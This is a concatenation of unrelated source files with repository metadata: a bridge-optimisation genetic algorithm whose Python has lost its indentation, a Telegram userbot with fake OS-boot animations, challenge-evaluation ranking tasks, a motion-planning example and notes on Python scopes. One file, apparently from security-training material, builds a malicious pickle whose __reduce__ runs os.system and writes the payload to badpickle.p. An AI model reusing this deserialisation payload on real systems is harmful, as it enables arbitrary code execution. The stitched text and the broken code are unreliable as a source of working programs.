pathOPT = 'C:/Users/rocky/Desktop/Code/OPT' # path to where to place information for further analyses
pathOP = 'C:/Users/rocky/Desktop/Code/Op/' # path to where to place excel fil with optimize cross-section for VA
# Load Case
LC = 3
# Genetic Algorithm parameter
NP = 50 # number of particles
Itt = 100 # number of Iterations
PC = 1 # Ratio of children made per generation
mu = 0.035 # probability of mutating
cr = .6 # probability of crossing
# Cost function Slop
SlopD = 1.9
SlopW = 13
'''
'''
# start Parallel Pool
with Parallel(n_jobs=12, prefer="threads") as Parallel:
with os.scandir(path=path) as entries:
for entry in entries:
# Extract Data from file
File = entry.name
npzfile = np.load((os.path.join(path, File)))
Shape_Dimension = npzfile['Shape_Dimension']
AgrJN = npzfile['AgrJN']
Transmatrix = npzfile['Transmatrix']
TransT = npzfile['TransT']
Section_Prop = npzfile['Section_Prop']
P = npzfile['P']
L = npzfile['L']
MemberCOORDNum = npzfile['MemberCOORDNum']
G = np.min(MemberCOORDNum)
Shape_Set = npzfile['Shape_Set']
Group = npzfile['Group']
NM = npzfile['NM']
NR = npzfile['NR']
NDOF = npzfile['NDOF']
COORDNum = npzfile['COORDNum']
Modules = npzfile['Modules']
Wt = npzfile['Wt']
# Choose from desire Load Case
if LC == 1:
Pf = P[:, 0]
DNumber = AgrJN[:, 0]
elif LC == 2:
Pf = P[:, 1]
DNumber = AgrJN[:, 1]
elif LC == 3:
Pf = P[:, 2]
DNumber = AgrJN[:, 2]
elif LC == 4:
Pf = P[:, 3]
DNumber = AgrJN[:, 3]
elif LC == 5:
Pf = P[:, 4]
DNumber = AgrJN[:, 4]
else:
Pf = P[:, 5]
DNumber = AgrJN[:, 5]
# Dynamic Exploration Parameters
nvarmin = Shape_Set[:, 0]
nvarmax = Shape_Set[:, 1]
sigma = (Shape_Set[:, 1] - Shape_Set[:, 0] + 1) / 2
dynamicSig = (sigma - 1) / 100
# Blanks for Optimization
size = np.shape(Shape_Set[:, 0])[0]
MemberProp = np.zeros((NP, NM, 4))
GroupShape = np.zeros((NP, size), dtype=np.intc)
Local_Matrix = np.zeros((NP, NM, 12, 12))
AgrD = np.zeros(NP)
AgrDC = np.zeros(NP)
weight = np.zeros(NP)
Cost = np.zeros(NP)
CostC = np.zeros(NP)
Agr1 = np.zeros(1)
Agr2 = np.zeros(1)
# Create Random finesses population
Section.memgroupsec(NP, GroupShape, Shape_Set)
MemberProp[:, :] = Section_Prop[GroupShape[:, Group], :]
# start timer
start = timer()
# Run fitness function for starting population
Parallel(
delayed(SolutionStiffnessSpeed.DisplacementCy2)(NM, Modules, TransT, Transmatrix, NDOF, MemberCOORDNum,
L, Pf, MemberProp[x], Local_Matrix[x], COORDNum,
x, AgrD, DNumber, Agr1, Agr2)
for x in range(NP))
# evaluate starting population
weight[:] = np.sum(Wt[GroupShape[:, Group[:]]] * L, axis=1) / 12 + SlopW # weight function
CostCalculator.BridgeCost(SlopD, weight, AgrD, NP, Cost) # Cost Function
A = np.argmin(Cost)
BestP = Cost[A]
W = weight[A]
Deflection = AgrD[A]
setT = GroupShape[A]
for y in range(Itt):
J = np.arange(1, NP + 1)
J = np.flip(J)
J = J ** 5
Jsum = np.abs(np.sum(J))
PP = J / Jsum
NP = (np.round(PC * NP / 2) * 2).astype(np.intc)
CGroup = np.zeros(GroupShape.shape, dtype=np.intc)
chance = np.random.random(NP)
# Elitism (Keep the best individual of the population for the next generation)
Elite = GroupShape[0, :]
EliteCost = Cost[0]
# Parent Choosing and Mutation
for z in range((NP / 2).astype(np.intc)):
# select parents
P1 = Roullette.Wheel(PP)
P2 = Roullette.Wheel(PP)
# Crossover (Create children)
UniformCrossover.Uniform(GroupShape[P1], GroupShape[P2], CGroup, z, chance, cr, GroupShape[0])
# Mutation
Mutation3.mutant(CGroup[2 * z], CGroup[2 * z + 1], CGroup, mu, z, sigma)
# constrain offsprings
CGroup[:] = np.where(CGroup > Shape_Set[:, 0], CGroup, Shape_Set[:, 0])
CGroup[:] = np.where(CGroup < Shape_Set[:, 1], CGroup, Shape_Set[:, 1])
# evaluate children fitness
MemberProp[:, :] = Section_Prop[CGroup[:, Group], :]
Parallel(
delayed(SolutionStiffnessSpeed.DisplacementCy2)(NM, Modules, TransT, Transmatrix, NDOF,
MemberCOORDNum, L, Pf, MemberProp[x],
Local_Matrix[x], COORDNum, x, AgrDC, DNumber, Agr1, Agr2)
for x in range(NP))
# evaluate cost of each children
weightC = np.zeros(NP)
weightC[:] = np.sum(Wt[CGroup[:, Group[:]]] * (L / 12), axis=1) + SlopW
# cost function
CostCalculator.BridgeCost(SlopD, weightC, AgrDC, NP, CostC)
A = np.argmin(CostC)
BestC = CostC[A]
# Update Population Best
if BestC < BestP:
setT = CGroup[A]
BestP = BestC
W = weightC[A]
Deflection = AgrDC[A]
print("Cost = ", BestP, " AgrD = ", Deflection, " Weight = ", W)
# merge population
Cost = np.hstack([Cost, CostC, EliteCost])
X = np.argsort(Cost)
GroupShape = np.vstack([GroupShape, CGroup, Elite])
GroupShape = GroupShape[X, :]
GroupShape = GroupShape[:NP, :]
Cost = Cost[X]
Cost = Cost[:NP]
# dynamic mutation parameters
mu = mu - .000005
sigma -= dynamicSig
# time taken to run each file
end = timer()
print(end - start)
# parameters of the most fit child
Result = Shape_Dimension[setT]
Q = np.where(Result[:, 2] == 0)
Result = Result.astype(np.object_)
Result[Q, 2] = "NaN"
# save results for further analysis
np.savez((os.path.join(pathOPT, File[:-4] + 'OPT')), setT=setT, W=W, NDOF=NDOF, COORDNum=COORDNum, MemberCOORDNum=MemberCOORDNum, Section_Prop=Section_Prop, Group=Group, AgrJN=AgrJN, P=P, L=L, NM=NM, Modules=Modules, TransT=TransT, Transmatrix=Transmatrix)
workbook = xlsxwriter.Workbook(pathOP + File[:-4] + '.xlsx')
worksheet = workbook.add_worksheet()
workbook.close()
df = pd.DataFrame(Result)
df.to_excel(pathOP + File[:-4] + '.xlsx', index=False)
end = timer()
print(end - start)
| 38.613953
| 269
| 0.484462
|
79a8db3fec89730990fa9a30047a9003026f5314
| 8,019
|
py
|
Python
|
userbot/plugins/os.py
|
Fregiant16/fregiantuserbot
|
6cb23022a1dfa66551c5ded1928d9fded16e0684
|
[
"MIT"
] | 1
|
2020-04-14T15:19:47.000Z
|
2020-04-14T15:19:47.000Z
|
userbot/plugins/os.py
|
Fregiant16/fregiantuserbot
|
6cb23022a1dfa66551c5ded1928d9fded16e0684
|
[
"MIT"
] | null | null | null |
userbot/plugins/os.py
|
Fregiant16/fregiantuserbot
|
6cb23022a1dfa66551c5ded1928d9fded16e0684
|
[
"MIT"
] | 2
|
2020-12-01T02:27:27.000Z
|
2022-02-16T08:32:11.000Z
|
"""Emoji
Available Commands:
.emoji shrug
.emoji apple
.emoji :/
.emoji -_-"""
from telethon import events
import asyncio
from userbot import CMD_HELP
from userbot.utils import admin_cmd
@borg.on(admin_cmd(pattern=f"macos", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "macos":
await event.edit(input_str)
animation_chars = [
"`Connessione a Hackintosh...`",
"`Inizializza Hackintosh Login.`",
"`Loading Hackintosh... 0%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 3%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 9%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 23%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 39%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 69%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Hackintosh... 89%\n█████████████████████▒▒▒▒ `",
"`Loading Hackintosh... 100%\n█████████████████████████ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Hackintosh`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"windows", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "windows":
await event.edit(input_str)
animation_chars = [
"`Connessione a Windows 10...`",
"`Inizializza Windows 10 Login.`",
"`Loading Windows 10... 0%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 3%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 9%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 23%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 39%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 69%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Windows 10... 89%\n█████████████████████▒▒▒▒ `",
"`Loading Windows 10... 100%\n█████████████████████████ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Windows 10`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"linux", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "linux":
await event.edit(input_str)
animation_chars = [
"`Connessione a Linux...`",
"`Inizializza Linux Login.`",
"`Loading Linux... 0%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 3%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 9%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 23%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 39%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 69%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Linux... 89%\n█████████████████████▒▒▒▒ `",
"`Loading Linux... 100%\n█████████████████████████ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Linux`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"stock", allow_sudo=True))
@borg.on(events.NewMessage(pattern=r"\.(.*)", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 11)
input_str = event.pattern_match.group(1)
if input_str == "stock":
await event.edit(input_str)
animation_chars = [
"`Connessione a Symbian OS...`",
"`Inizializza Symbian OS Login.`",
"`Loading Symbian OS... 0%\n█████████████████████████ `",
"`Loading Symbian OS... 3%\n█████████████████████▒▒▒▒ `",
"`Loading Symbian OS... 9%\n█████████████▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 23%\n█████████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 39%\n█████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 69%\n██▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 89%\n█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Loading Symbian OS... 100%\n▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ `",
"`Welcome...\n\nStock OS: Symbian OS\nCurrent OS: Symbian OS`\n\n**My PC Specs:**\n\n **CPU:** __2.9GHz Intel Core i9-8950HK (hexa-core, 12MB cache, up to 4.8GHz)__\n\n**Graphics:** __Nvidia GeForce GTX 1080 OC (8GB GDDR5X)__\n\n**RAM:** __32GB DDR4 (2,666MHz)__\n\n**Screen:** __17.3-inch, QHD (2,560 x 1,440) 120Hz G-Sync__\n\n**Storage:** __512GB PCIe SSD, 1TB HDD (7,200 rpm)__\n\n**Ports:** __2 x USB 3.0, 1 x USB-C 3.0, 1 x USB-C (Thunderbolt 3), HDMI, mini DisplayPort, Ethernet, headphone jack, microphone jack__\n\n**Connectivity:** __Killer 1550 802.11ac Wi-Fi, Bluetooth 5.0__\n\n**Camera:** __Alienware FHD camera, Tobii IR Eye-tracking with Windows Hello__\n\n**Size:** __16.7 x 13.1 x 1.18 inches (42.4 x 33.2 x 2.99cm; W x D x H)__"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
| 43.345946
| 759
| 0.536351
|
078ba44bc1dc4e8511b0c4cfa1d00b1f3584dbbb
| 6,060
|
py
|
Python
|
app/grandchallenge/evaluation/tasks.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/evaluation/tasks.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
app/grandchallenge/evaluation/tasks.py
|
pushpanjalip/grand-challenge.org
|
607a30c9fe0e603b79f7b49dc9efeb48a484ebfc
|
[
"Apache-2.0"
] | null | null | null |
import uuid
from statistics import mean, median
from celery import shared_task
from django.apps import apps
from grandchallenge.evaluation.utils import Metric, rank_results
@shared_task
def set_evaluation_inputs(evaluation_pk):
"""
Sets the inputs to the Evaluation for a algorithm submission.
If all of the `AlgorithmEvaluation`s for this algorithm `Submission` are
successful this will set the inputs to the `Evaluation` job and schedule
it. If any of the `AlgorithmEvaluation`s are unsuccessful then the
`Evaluation` will be marked as Failed.
Parameters
----------
evaluation_pk
The primary key of the evaluation.Evaluation object
"""
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
evaluation = Evaluation.objects.get(pk=evaluation_pk)
unsuccessful_jobs = evaluation.submission.algorithmevaluation_set.exclude(
status=Evaluation.SUCCESS
).count()
if unsuccessful_jobs:
evaluation.update_status(
status=evaluation.FAILURE,
output=(
f"The algorithm failed to execute on {unsuccessful_jobs} "
f"images."
),
)
else:
from grandchallenge.evaluation.serializers import (
AlgorithmEvaluationSerializer,
)
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
serializer = AlgorithmEvaluationSerializer(
evaluation.submission.algorithmevaluation_set.all(), many=True
)
interface = ComponentInterface.objects.get(
title="Predictions JSON File"
)
civ = ComponentInterfaceValue.objects.create(
interface=interface, value=serializer.data
)
evaluation.inputs.set([civ])
evaluation.signature.apply_async()
def filter_by_creators_most_recent(*, evaluations):
# Go through the evaluations and only pass through the most recent
# submission for each user
users_seen = set()
filtered_qs = []
for e in evaluations:
creator = e.submission.creator
if creator not in users_seen:
users_seen.add(creator)
filtered_qs.append(e)
return filtered_qs
def filter_by_creators_best(*, evaluations, ranks):
best_result_per_user = {}
for e in evaluations:
creator = e.submission.creator
try:
this_rank = ranks[e.pk]
except KeyError:
# This result was not ranked
continue
if creator not in best_result_per_user or (
this_rank < ranks[best_result_per_user[creator].pk]
):
best_result_per_user[creator] = e
return [r for r in best_result_per_user.values()]
@shared_task # noqa: C901
def calculate_ranks(*, phase_pk: uuid.UUID): # noqa: C901
Phase = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Phase"
)
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
phase = Phase.objects.get(pk=phase_pk)
display_choice = phase.result_display_choice
score_method_choice = phase.scoring_method_choice
metrics = (
Metric(
path=phase.score_jsonpath,
reverse=(phase.score_default_sort == phase.DESCENDING),
),
*[
Metric(path=col["path"], reverse=col["order"] == phase.DESCENDING,)
for col in phase.extra_results_columns
],
)
if score_method_choice == phase.ABSOLUTE:
def score_method(x):
return list(x)[0]
elif score_method_choice == phase.MEAN:
score_method = mean
elif score_method_choice == phase.MEDIAN:
score_method = median
else:
raise NotImplementedError
valid_evaluations = (
Evaluation.objects.filter(
submission__phase=phase, published=True, status=Evaluation.SUCCESS,
)
.order_by("-created")
.select_related("submission__creator")
.prefetch_related("outputs__interface")
)
if display_choice == phase.MOST_RECENT:
valid_evaluations = filter_by_creators_most_recent(
evaluations=valid_evaluations
)
elif display_choice == phase.BEST:
all_positions = rank_results(
evaluations=valid_evaluations,
metrics=metrics,
score_method=score_method,
)
valid_evaluations = filter_by_creators_best(
evaluations=valid_evaluations, ranks=all_positions.ranks
)
final_positions = rank_results(
evaluations=valid_evaluations,
metrics=metrics,
score_method=score_method,
)
evaluations = Evaluation.objects.filter(submission__phase=phase)
_update_evaluations(
evaluations=evaluations, final_positions=final_positions
)
def _update_evaluations(*, evaluations, final_positions):
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
for e in evaluations:
try:
rank = final_positions.ranks[e.pk]
rank_score = final_positions.rank_scores[e.pk]
rank_per_metric = final_positions.rank_per_metric[e.pk]
except KeyError:
# This result will be excluded from the display
rank = 0
rank_score = 0.0
rank_per_metric = {}
e.rank = rank
e.rank_score = rank_score
e.rank_per_metric = rank_per_metric
Evaluation.objects.bulk_update(
evaluations, ["rank", "rank_score", "rank_per_metric"]
)
@shared_task
def assign_evaluation_permissions(*, challenge_pk: uuid.UUID):
Evaluation = apps.get_model( # noqa: N806
app_label="evaluation", model_name="Evaluation"
)
for e in Evaluation.objects.filter(
submission__phase__challenge__id=challenge_pk
):
e.assign_permissions()
| 28.995215
| 79
| 0.649175
|
c55d39c751718cdb4e63aa3da65bf7a16d16bbdf
| 1,751
|
py
|
Python
|
pomp/example_problems/doubleintegrator.py
|
Aand1/pyOptimalMotionPlanning
|
5f06b4331149b86538e1ecfa7ccb9915c8cb510a
|
[
"Apache-2.0"
] | null | null | null |
pomp/example_problems/doubleintegrator.py
|
Aand1/pyOptimalMotionPlanning
|
5f06b4331149b86538e1ecfa7ccb9915c8cb510a
|
[
"Apache-2.0"
] | null | null | null |
pomp/example_problems/doubleintegrator.py
|
Aand1/pyOptimalMotionPlanning
|
5f06b4331149b86538e1ecfa7ccb9915c8cb510a
|
[
"Apache-2.0"
] | 1
|
2021-07-07T16:15:52.000Z
|
2021-07-07T16:15:52.000Z
|
from OpenGL.GL import *
from geometric import *
from ..spaces.objective import *
from ..spaces.statespace import *
from ..spaces.configurationspace import *
from ..spaces.edgechecker import *
from ..spaces.metric import *
from ..planners.problem import PlanningProblem
class DoubleIntegratorVisualizer:
def __init__(self,workspace):
self.base = workspace
def toScreen(self,q):
return q[0],q[1]
def toState(self,x,y):
return (x,y,0,0)
def drawObstaclesGL(self):
self.base.drawObstaclesGL()
def drawVerticesGL(self,qs):
self.base.drawVerticesGL(qs)
def drawRobotGL(self,q):
glColor3f(0,0,1)
glPointSize(7.0)
self.drawVerticesGL([q])
l = 0.05
glBegin(GL_LINES)
glVertex2f(q[0],q[1])
glVertex2f(q[0]+l*q[2],q[1]+l*q[3])
glEnd()
def drawGoalGL(self,goal):
self.base.drawGoalGL(goal)
def drawInterpolatorGL(self,interpolator):
self.base.drawInterpolatorGL(interpolator)
def doubleIntegratorTest():
cspace = Geometric2DCSpace()
#cspace.addObstacle(Circle(0.5,0.4,0.39))
vspace = BoxConfigurationSpace([-1,-1],[1,1])
aspace = BoxConfigurationSpace([-5,-5],[5,5])
start = [0.06,0.25,0,0]
goal = [0.94,0.25,0,0]
objective = TimeObjectiveFunction()
goalRadius = 0.2
controlSpace = CVControlSpace(cspace,vspace,aspace,dt=0.05,dtmax=0.5)
return PlanningProblem(controlSpace,start,goal,
objective=objective,
visualizer=DoubleIntegratorVisualizer(cspace),
goalRadius = goalRadius,
euclidean = True)
| 30.189655
| 74
| 0.606511
|
95ee3db30911dcd29b4bb789a3349024997a81f7
| 391
|
py
|
Python
|
poshmon-tools/font.py
|
super-phreak/poshmon
|
cca861b0d6cb02fe4969c2dc099cbff5bae38134
|
[
"MIT"
] | 1
|
2021-11-18T03:00:13.000Z
|
2021-11-18T03:00:13.000Z
|
poshmon-tools/font.py
|
super-phreak/poshmon
|
cca861b0d6cb02fe4969c2dc099cbff5bae38134
|
[
"MIT"
] | null | null | null |
poshmon-tools/font.py
|
super-phreak/poshmon
|
cca861b0d6cb02fe4969c2dc099cbff5bae38134
|
[
"MIT"
] | null | null | null |
#Needed because powershell ConvertFrom-Json is dumb and treats 'A' and 'a' as the same.
from pokedata import Sprite
class Font:
def __init__(self,addr,char):
self.addr = addr
self.char = char
self.sprite = Sprite.decode1BPP(addr,1,1)
def to_json(self):
return {
'char' : self.char,
'sprite' : self.sprite.to_json()
}
| 26.066667
| 87
| 0.598465
|
bb29f054b294fe2c02496fc64ce65a82f11bf2bb
| 1,027
|
py
|
Python
|
Mundo 2 - Estruturas de Controle/ex059.py
|
diegomcosta/Curso-em-Video-Python
|
3f91b27390b90b686547931d4b1116d1a801cac6
|
[
"MIT"
] | null | null | null |
Mundo 2 - Estruturas de Controle/ex059.py
|
diegomcosta/Curso-em-Video-Python
|
3f91b27390b90b686547931d4b1116d1a801cac6
|
[
"MIT"
] | null | null | null |
Mundo 2 - Estruturas de Controle/ex059.py
|
diegomcosta/Curso-em-Video-Python
|
3f91b27390b90b686547931d4b1116d1a801cac6
|
[
"MIT"
] | null | null | null |
n1 = int(input("Primeiro valor: "))
n2 = int(input("Segundo valor: "))
op = maior = 0
while (op != 5):
print(" [1] somar")
print(" [2] multiplicar")
print(" [3] maior")
print(" [4] novos números")
print(" [5] sair do programa")
op = int(input(">>>>> Qual é a sua opção? "))
if (op < 1 or op > 5):
print("Opção inválida. Tente novamente")
else:
if (op == 1):
print(f"A soma entre {n1} e {n2} é {n1 +n2}")
elif (op == 2):
print(f"O resultado de {n1} X {n2} é {n1 * n2}")
elif (op == 3):
maior = n1
if (n2 > n1):
maior = n2
print(f"Entre {n1} e {n2} o maior valor é {maior}")
elif (op == 4):
print("Informe os números novamente:")
n1 = int(input("Primeiro valor: "))
n2 = int(input("Segundo valor: "))
elif (op == 5):
print("Finalizando...")
print("=-=" * 10)
print("Fim do programa! Volte sempre!")
| 31.121212
| 63
| 0.462512
|
88f5aee4dbf416d259f2392c712b765b371a5860
| 281
|
py
|
Python
|
scripts/pickle/3pickle.py
|
trailofbits/not-slithering-anywhere
|
250a7d47762bfd504195a450ce49c146a282323c
|
[
"Apache-2.0"
] | 11
|
2020-08-06T19:18:31.000Z
|
2022-02-25T01:50:04.000Z
|
scripts/pickle/3pickle.py
|
Hinge/not-slithering-anywhere
|
6f9a263e834ce1b863d33dbb80994eb6a66a5f5d
|
[
"Apache-2.0"
] | null | null | null |
scripts/pickle/3pickle.py
|
Hinge/not-slithering-anywhere
|
6f9a263e834ce1b863d33dbb80994eb6a66a5f5d
|
[
"Apache-2.0"
] | 3
|
2021-01-07T16:55:02.000Z
|
2022-02-25T01:50:10.000Z
|
import pickle
import os
class F(object):
def __reduce__(self):
return (os.system, (('/usr/bin/id > dump',)))
f = F()
payload = pickle.dumps(f)
print(payload)
pickle.loads(payload)
with open('badpickle.p', 'wb') as fh:
pickle.dump(f, fh, pickle.HIGHEST_PROTOCOL)
| 18.733333
| 53
| 0.658363
|
9a633dd4469a528a405795fc606d3ac0073406c4
| 1,820
|
py
|
Python
|
.history/my_classes/ScopesClosuresAndDecorators/nonLocalScopes_20210710221612.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
.history/my_classes/ScopesClosuresAndDecorators/nonLocalScopes_20210710221612.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
.history/my_classes/ScopesClosuresAndDecorators/nonLocalScopes_20210710221612.py
|
minefarmer/deep-Dive-1
|
b0675b853180c5b5781888266ea63a3793b8d855
|
[
"Unlicense"
] | null | null | null |
""" NonLocal Scopes
Inner Functions
We can define functions from inside another function:
"""
def outer_func():
# some code
# this is an example of a nested function
def inner_func():
# some code
inner_func()
outer_func()
"""
Both functions have access to the global and built-in scopes as well as their respective local scopes
But the inner function also has access to its enclosing scope - the scope of the outer function
That scope is neither local (to inner_func) nor global - it is called a non local scope
Referencing variables from the inclosing scope
Consider this example
module1.py
a = 10
def outer_func():
print(a)
outer_func() When we call outer_func, Python sees the reference to a
Consider this example
module1.py
def outer_func():
a = 10
def inner_func():
print(a)
inner_func()
outer_func()
When we call outer_func, inner_func is created and called
When inner_func is called, Python does not find a in the local(inner_func) scope
So it looks for it in the enclosing scope, in this case the scope of the outer func
Since it does not find it there either, it looks in the enclosing (global) scope
Modifying global variables
We saw how to use the global keyword in order to modify a global variable within a nest scope.
a = 10
def outer_func():
global a
a = 1000
outer_func()
print(a) # 1000
We can of course do the same thing from within a nested function
def outer_func2():
def inner_func():
global a
a = 'hello
inner_func()
outer_func2()
print(a) # hello
Modifying nonlocal variables
Can we modify variable defined in the outer nonlocal scope?
def outer_func():
x = 'hello'
def inner_func():
x =
"""
| 19.569892
| 101
| 0.684066
|
1a0cd992f7907b50ee40750e041fcf5a257cd960
| 104
|
py
|
Python
|
enthought/naming/pyfs_object_factory.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/naming/pyfs_object_factory.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/naming/pyfs_object_factory.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from __future__ import absolute_import
from apptools.naming.pyfs_object_factory import *
| 26
| 49
| 0.855769
|
dc7fb771d0bc966f1d7cc6f74f7c4a0887dfa647
| 123,706
|
py
|
Python
|
src/sage/crypto/mq/sr.py
|
vbraun/sage
|
07d6c37d18811e2b377a9689790a7c5e24da16ba
|
[
"BSL-1.0"
] | 3
|
2016-06-19T14:48:31.000Z
|
2022-01-28T08:46:01.000Z
|
src/sage/crypto/mq/sr.py
|
vbraun/sage
|
